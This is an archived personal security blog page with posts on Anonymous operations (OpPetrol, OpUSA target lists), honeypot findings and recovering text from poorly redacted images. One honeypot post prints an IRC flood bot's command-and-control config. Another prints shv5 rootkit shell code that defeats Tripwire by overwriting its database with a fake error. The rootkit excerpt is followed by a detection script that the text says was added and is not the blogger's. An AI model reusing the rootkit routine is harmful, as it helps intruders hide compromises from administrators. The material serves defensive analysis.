This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques


Receive Your Complimentary eBook NOW!

"Intrusion Detection Systems with Snort: Advanced IDS Techniques Using Snort, Apache, MySQL, PHP, and ACID"

Protect your network with Snort: the high-performance, open source IDS. Snort gives network administrators an open source intrusion detection system that outperforms proprietary alternatives.

Now, Rafeeq Ur Rehman explains and simplifies every aspect of deploying and managing Snort in your network. You'll discover how to monitor all your network traffic in real time; update Snort to reflect new security threats; automate and analyze Snort alerts; and more. Best of all, Rehman's custom scripts integrate Snort with Apache, MySQL, PHP, and ACID - so you can build and optimize a complete IDS solution more quickly than ever before.

  • An expert introduction to intrusion detection and the role of Snort
  • Writing and updating Snort rules to reflect the latest attacks and exploits
  • Contains detailed coverage of Snort plug-ins, preprocessors, and output modules
  • Logging alerts to a MySQL database
  • Using ACID to search, process, and analyze security alerts
  • Using SnortSnarf to analyze Snort log files
  • XML support for Snort via the Simple Network Markup Language (SNML)


Request your free copy today!


@ChaCha You Guys Rock, Thanks for the Help!

You might have read my open letter to ChaCha regarding copyright infringement and fair use of my SnapChat blog post.

I'm happy to say that ChaCha was very polite, and corrected the issue immediately along with an apology!

I didn't have to jump through any legal hoops or anything.  I politely asked, and they reacted right away.

This is how human resources and customer service should be done folks.

Stay Classy ChaCha!

Tech Support SCAM! The MUST SEE Video about iYogi!

Having personally seen the fear mongering iYogi used against a family member to get you to pay for their services (and having to clean up her computer after their software was installed), this video does not shock me in the least.  Share this video with all your friends and family and warn them about the scam which is iYogi tech support.


An Open Letter to @ChaCha Regarding Copyright Infringement

UPDATE: ChaCha was VERY helpful with this, and resolved the issue right away! Stay classy ChaCha!

This evening I stumbled on something a little disturbing.  ChaCha has answered the question "How do I save a picture from SnapChat on a droid?" word-for-word with text from my own blog post on the subject.

As such, I have submitted the following letter to ChaCha.

Hello,

I happened across the answer to "How do I save a picture from Snapchat on a Droid?" tonight, and I'm a little upset. The answer is directly copied from a post on my blog caffeinesecurity.blogspot.com.

In accordance with Fair Use, I would like to request that should you wish to continue to include this content word-for-word from my blog, that you also include a link to the source blog post http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html. I feel this would be a win-win for both of us, and we won't need to worry about getting your legal department involved.

I eagerly await your response within 10 business days.

Thanks,

Ken
Caffeine Security



FREE CLASS!!! Malicious Software and its Underground Economy

Starting June 13 I will be taking the free Coursera course "Malicious Software and its Underground Economy".

The course will explore the world of malicious software, and look at how it's used to generate millions of dollars per year.

If you have some programming experience, as well as security experience, I'd like to encourage you to sign up!

OpPetrol - It's Not About the Oil

I've posted a new Threat Watch bulletin for OpPetrol - a multi-target operation being run by Anonymous.

Updates to the bulletin can be read here.

Below is the bulletin posted in its entirety.


INTEL BRIEF
First Release: 19MAY2013
Updated: 19MAY2013
Subject: Anonymous "OpPetrol"

Target: United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government)

Specific named targets:
Saudi Arabia government emails (Most likely Phishing - http://pastebin.com/0Yr6kyWA)

Additional high probability targets:
Pending

Date: June 20, 2013

Attackers:
AnonGhost
Others Pending
Attack types:
Distributed Denial of Service Attacks (DDoS)
Website Defacement
Possible leak of sensitive information
Details:
Original announcement on Pastebin: http://pastebin.com/Xsewfqvr
Second announcement on Pastebin: http://pastebin.com/38kvvD1S

Quote from the announcement: "As petrol is sold with the dollar currency of the U S we find this not acceptable when the oil should be sold at the country of Origin, making petrol a lot less then what you the citizens is paying for it."

Additional Analysis:
A look at the target list vs. top oil producers of the world (data from CIA World Factbook)
 Rank  On Target List  Top Oil Producers       Amount Produced (BBL/Day)
    1  No              Russia                  10,370,000
    2  Yes             Saudi Arabia            10,000,000
    3  Yes             United States            9,023,000
    4  No              Iran                     4,231,000
    5  Yes             China                    4,150,000
    6  Yes             Canada                   3,592,000
    7  No              United Arab Emirates     3,087,000
    8  No              Mexico                   2,934,000
    9  No              Iraq                     2,900,000
   10  Yes             Kuwait                   2,682,000
   11  No              Brazil                   2,633,000
   12  No              Nigeria                  2,525,000
   13  No              Venezuela                2,470,000
   14  No              Norway                   1,998,000
   15  No              Algeria                  1,885,000
   16  No              Angola                   1,840,000
   17  No              Kazakhstan               1,635,000
   18  Yes             Qatar                    1,631,000
   19  Yes             United Kingdom           1,099,000
  ...  ...             ...                            ...
   43  Yes             Germany                    165,300
   50  Yes             Italy                       99,200
   60  Yes             France                      49,530
  101  Yes             Israel                         100
  102  No              Jordan                          20
  103  No              Slovenia (Last Place)            5
Based upon the above target list, this attack has nothing to do with oil exports, especially since Israel only produces 100 BBL/Day and is third from the bottom.

Also of note, the announcement speaks about Syria stealing your retirement and savings, but it was Cyprus, not Syria, that raided savings accounts when the country went bankrupt.

This operation appears to simply be an attempt at OpUSA and OpIsrael again, with a few extra countries thrown into the mix so that the operation can be declared a "success" even if only one of the target countries is compromised.  This operation is simply a publicity stunt, and not by any means a meaningful attempt to change anything.


Recommendations: Standard recommendations apply
Note: Based upon the past failures of OpIsrael and OpUSA, do not expect a large turnout for this operation either.

Prior to June 20 - In order for multiple sites to be defaced at the same time, malware infection or compromise of credentials must occur ahead of time.  Change passwords, and perform full antivirus scans of systems.  Monitor firewall logs for suspicious activity involving external IP addresses.  Be vigilant, and warn employees of highly targeted phishing attacks.
On June 20 - Monitor network traffic, and coordinate with ISP should any signs of DDoS be seen.
After June 20 - Look for signs of compromise after DDoS attack.  A common technique now being employed by multiple organizations is to mask hacking attacks with DDoS attacks.

New Honeypot Online!

I just got my second honeypot up and running - Glastopf!

This honeypot will allow me to capture HTTP based attacks, as well as the SSH attacks I'm already capturing with Kippo.

If I get any interesting hits I'll be sure to post!

How Not to Redact a Document, Part 2

Last year I made a post about How Not To Redact a Document, in which I showed that some digitally redacted documents can have the redaction removed by simply highlighting the redacted text.

Unfortunately, digitally redacted documents aren't the only ones susceptible to attack.

Recently the IRS has come under fire for sending Tea Party groups probing letters threatening their non-profit status unless they answer a large number of questions.

Fox News redacted parts of the letter, as you can see below.


However, Fox News really failed at their redaction process, and left a lot of sensitive information exposed.

I personally use a photo editor called Zoner Photo Studio, but the same technique can be used in Photoshop.

First, let's play with the image levels a little bit...


Move some sliders around, and text begins to magically appear!


Now let's adjust the contrast and brightness a little.


After performing the manipulations above, I doubled the size of the image for easier examination.

You can pretty clearly make out some of the details, including mailing address and phone numbers.

Of course this information is already available online anyways, so I'm not sure why it was redacted.  However, this could be a very interesting technique to use against Freedom of Information Act documents with redacted sections.

Once again, related reading: A Primer On Electronic Document Security.
Maybe someone will pay attention this time.

@USNISTGOV CVE Alerts Now On @CaffSec Twitter

Thanks to the folks at NIST for providing an RSS feed of new CVEs, I have incorporated CVEs into my automated #exploitAlert feed on Twitter.

In addition to CVE content, the #exploitAlert feed provides information on new vulnerabilities/exploits found on PasteBin and similar sites.

If you're interested in how the CVE feed works, I have made the feed available on my IFTTT profile.

IRC Floodbot Placed on My Honeypot

Someone dropped off an IRC Floodbot today on my honeypot.

It's nothing spectacular or groundbreaking, and appears to have been around since at least 2009, maybe earlier.

I've replaced the binaries with VirusTotal analysis, and posted everything else as I received it.

You can browse the shell scripts, as well as the malware's help file, at my Google Code site.

By the way, here's the config info for the bot's command and control center:
NICK Hack
USERFILE 1
CMDCHAR *
LOGIN eliata
IRCNAME juno boot flood
MODES +ix-ws
TOG CC 0
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #m0atrea
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nt
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
SERVER irc.deadly-co.ro 6667

I hope you enjoy examining the bot.

Hacking to Setup a Free Counter Strike Server?

This week an attacker cracked my honeypot's root password "123456" and tried to install software I've never seen before.

The file was quite large for most malware packages, at over 20 MB.  Curiously I uploaded the file to VirusTotal and was quite surprised that it came back completely clean.
VirusTotal Analysis of csservers_redirecte_linux_hlds.zip
After digging into the file further, I found that the file was actually a Counter Strike server?

Sure enough, the more I dug, the more I verified the hacker had compromised my honeypot with the sole purpose of running a Counter Strike server.


I use the term hacker loosely because based upon the attack, the person did not seem very knowledgeable outside of using his install scripts.

You can read the full attack logs on Google Drive.

This is the first time I've ever seen someone compromise a system to install a game server.  I know there was a day when IRC chat bots were all the rage that people would compromise servers just to install them, but they're lightweight and don't generate a lot of traffic.  A gaming server is going to generate a lot of traffic and CPU load, and surely would be noticed almost right away, right???

Identifying Hacker Group Locations Based Upon Temporal Signatures

What day and time an event occurs can sometimes be very helpful in determining the origin of that event.

Analysis Intelligence just posted an excellent article titled "Pattern of Life and Temporal Signatures of Hacker Organizations".

This article explores the possibilities of using the day/time of hacking activity to determine not only what part of the world the activity originated from, but also if they're a state sponsored group or not.

I highly encourage you to check out the article, and if applicable, apply it to your own research.

OpUSA Failure Shows Anonymous is Past Their Prime

There have been indications of this for quite a while now, but I think it's time someone finally came out and said it.

Anonymous is losing steam, and quickly dying.

That's right, Anonymous is quickly becoming an obsolete part of a forgotten era of the Internet.

OpUSA promised to be a major cyber threat against the United States Government and major banks.  Websites such as FBI.gov, Whitehouse.gov, and Bank of America were the key targets.

The actual damage? (per http://security.radware.com/Threats-Attacks/opusa/)

  • An alert system which was being decommissioned by the Honolulu Police Department
  • A Blood Bank
  • Embassy of Cape Verde in the US
  • ...and a handful of low-traffic websites which most people have never heard of.
So what happened? Simply put, most of the "smart" hackers in Anonymous have already been arrested, or have realized that prison orange does not look good on them.  Compound this with the fact that members of Anonymous now know that their organization has been compromised by terrorist groups and law enforcement alike, and many members of Anonymous are now most likely finished with the group's illegal activities. A quick look at the number of news headlines about "Anonymous Hacker" shows the group has definitely gone past their prime, and may soon be going the way of the dodo, at least for their hacking activities.




How much longer will Anonymous hacking groups last? Based upon current trends they may still be around for a while yet, but gone are the days where Anonymous should be considered a serious threat.

Instead, after the failure of OpUSA, they're now probably the laughing stock of the Internet.

If you're interested, you can pick up a #OpUSA #FAIL t-shirt from my CafePress shop.

The NSA's Guide to Internet Research

The NSA recently released on their Declassification and Transparency page "Untangling The Web - A Guide to Internet Research".

This 642 page document contains search techniques and tips for everything from basic search fundamentals to "Google Hacking" and even how to find information on the "Invisible" internet.







OpUSA Updated Target List Posted

I've managed to get a copy of the OpUSA target list.  If you're at one of these organizations, be extra vigilant.

HIGH profile target list
http://www.defense.gov/
http://pentagontours.osd.mil/
http://www.pentagonchannel.mil/
http://www.archives.gov/
http://www.whs.mil/
http://www.nsa.gov/
http://nsa.nato.int
http://www.fbi.gov/
http://www.whitehouse.gov/

Additional targets are listed in the updated Threat Watch brief.

#OpUSA - So far an Epic Failure

In the early hours of #OpUSA, in the words of Anonymous "Op has failed to deliver!"

Anonymous et al. actually started their "hacking spree" on May 4...but no one really noticed.  Probably because most of the websites were foreign hosted sites (you know, outside the target "USA"), or sites most people have never even heard of.  Somewhere the SEO marketing gurus of jrzydevilmarketing.info and clearseo.net are quietly cursing, but if a tree falls on a SEO marketer's website, but no one ever visits it, does it still make a sound?

The attackers stepped up their game on May 5 and hacked even more websites.  And by more, I mean more websites most people have never heard of in the USA.

Protip: Hacking Chinese, French, and Italian websites in the name of #OpUSA does not make a bit of difference to 99.999% of people in the USA.

May 6 - They HACKED BANK OF AMERICA.  OMG!!!! No...wait...they hacked Blood Bank of America.  Really guys? You hacked a blood bank? This speaks of fail on so many levels it's not funny.  That's like using your bat to call out a home run, then hitting a ground rule double.  Sure, it just went out of the park, but it's nowhere near as effective.

Early hours of May 7 - A short list of websites was published (because these guys are clearly riding a "short bus"), and finally a target barely worth noting - the Honolulu Police Department alert system which isn't even used anymore.
“HPD Alerts was a pilot program (used) to provide breaking information to the public,” Yu said. “It was recently discontinued due to technical problems not associated with the cyberattack.”

So let's see - Anonymous and company planned to take down Whitehouse.gov, FBI, and Bank of America.

In fact, they even made this statement:
Anonymous will make sure that this May 7th will be a day to remember. On that day Anonymous will start phase one of operation USA. America you have committed multiple war crimes in Iraq, Afghanistan, Pakistan, and recently you have committed war crimes in your own country

So...you've got less than 24 hours for "OpUSA" to be a "day to remember".  So far it's been an epic failure which will be forgotten by Friday.

#TickTock

eBook Review: The Password Management Guide

Let's be honest.  Most people have a small set of passwords they reuse on multiple websites.  They come up with a password they think is secure, but by reusing the password on multiple sites, a compromise of one account results in a compromise of the rest.

But nobody would want to hack you, right?  Wrong.  There's a lot of value in a compromised account.

  • Do you use Amazon.com? A compromised account can order goods and have them shipped to a different address.
  • Do you use PayPal? A compromised account could wipe out your bank account.
  • Do you email family and friends? A compromised account could be used by scammers to trick your family and friends into sending money through Western Union to the scammer overseas.
  • Do you use social networking? A compromised account could be used to spam your friends.
But remembering multiple, complex passwords is hard!!!!

It doesn't have to be.

I was very impressed by the information contained within The Password Management Guide.

The guide covers the following topics and more:

  • Dangers of password re-use
  • How to create a secure password
  • Examples of available password manager programs
  • Two-factor Authentication
  • How to monitor to see if your password has been compromised
I found the guide very well written, and it should be extremely useful to anyone regardless of "tech savvy" level.

And the good news is, for a limited time you can get the 35 page eBook FREE!

Download Here!

Do you like the guide? Hate it? Feel free to let me know in the comments section below.

OpUSA to Strike US Government and Banking Infrastructure May 7

Anonymous and several other hacking groups are planning to attack the US Government and Banking Infrastructure on May 7, 2013.

I added a threat briefing on OpUSA, what's being targeted, and by whom, to my Threat Watch site.

Currently, the only named targets of this attack are Whitehouse.gov, FBI, and Bank of America.  However, I'm sure other targets will be included.

If you work for a government agency, or in the banking industry, be vigilant, and be on the lookout for highly targeted phishing attacks.

You can read the full briefing at my Threat Watch site.

Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats

Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention.  This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
    echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"

    if [ -f /var/lib/tripwire/$uname.twd ]; then
        chattr -isa $twd
        echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
        echo "${RED} ALERT! tripwire database found ${RES}"
        echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
        echo "-----------------------------------------" > $twd
        echo "Tripwire segment-faulted !" >> $twd
        echo "-----------------------------------------" >> $twd
        echo "" >> $twd
        echo "The reasons for this may be: " >> $twd
        echo "" >> $twd
        echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
        echo "corrupted files while checking for possible change etc." >> $twd
        echo ""
        echo "pls. rerun tripwire to build the database again!" >> $twd
        echo "" >> $twd
    else
        echo "${WHI} lucky you: Tripwire database not found. ${RES}"
    fi
else
    echo "${WHI} guess not. ${RES}"
fi
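The script above does three things worth detecting: it strips the immutable/append-only attributes from the Tripwire database, overwrites it with a plain-text "segment-faulted" excuse, and relies on the admin rebuilding the database (and thereby baselining the rootkit). The following is an added defender-side check, not code from the blog post or the shv5 script; it assumes the operator recorded a SHA-256 of the .twd file off-host when the database was built, and that lsattr is available (the attribute check is skipped otherwise).

```shell
#!/bin/sh
# Added example: verify a Tripwire database file (.twd) against the tampering
# the shv5 script performs. Exit status 0 = looks intact, 1 = tampering
# indicated. The expected hash must come from a copy kept off-host; a hash
# list stored locally is overwritten as easily as the database itself.
#   $1 = path to the .twd file, $2 = expected SHA-256 (hex, lowercase)
check_twd() {
    twd="$1"
    expected="$2"

    if [ ! -f "$twd" ]; then
        echo "MISSING: $twd"
        return 1
    fi

    # 1. The script replaces the database with a plain-text excuse. A real
    #    database never contains this string, so its presence is conclusive.
    if grep -q "Tripwire segment-faulted" "$twd"; then
        echo "TAMPERED: $twd contains the shv5 decoy text"
        return 1
    fi

    # 2. The script runs 'chattr -isa' before writing. If an immutable bit
    #    that we set earlier is gone, something with root cleared it.
    #    (Only a warning: not every filesystem supports the attribute.)
    if command -v lsattr >/dev/null 2>&1; then
        attrs=$(lsattr "$twd" 2>/dev/null | cut -d' ' -f1)
        case "$attrs" in
            *i*) ;;
            *) echo "WARNING: immutable bit not set on $twd" ;;
        esac
    fi

    # 3. Any other rewrite (including the MD5 trickery the post's title
    #    alludes to) shows up as a mismatch against the off-host SHA-256.
    actual=$(sha256sum "$twd" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "TAMPERED: sha256 mismatch for $twd (got $actual)"
        return 1
    fi

    echo "OK: $twd matches recorded hash"
    return 0
}
```

Run it from cron or a remote host before trusting any "rebuild the database" prompt; a MISSING or TAMPERED result means the baseline is gone and the box should be treated as compromised rather than re-baselined.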

April 2013 Set a New Record for My Blog - Over 14,000 page views!

I'm happy to say that April 2013 set a new record for my blog, with 14,573 unique page views.

I'd just like to say thank you to everyone who takes the time to read my blog!

With this large influx of visitors, I need to start working on more research projects and more content.

Some of the research projects I want to get started on require funding.  So if you would be so kind as to take a look at my Complimentary Industry Resources site, find something you like, and sign up for it, I would greatly appreciate it.  It won't cost you anything, and I get paid for every download or magazine subscription!

Thanks!!!!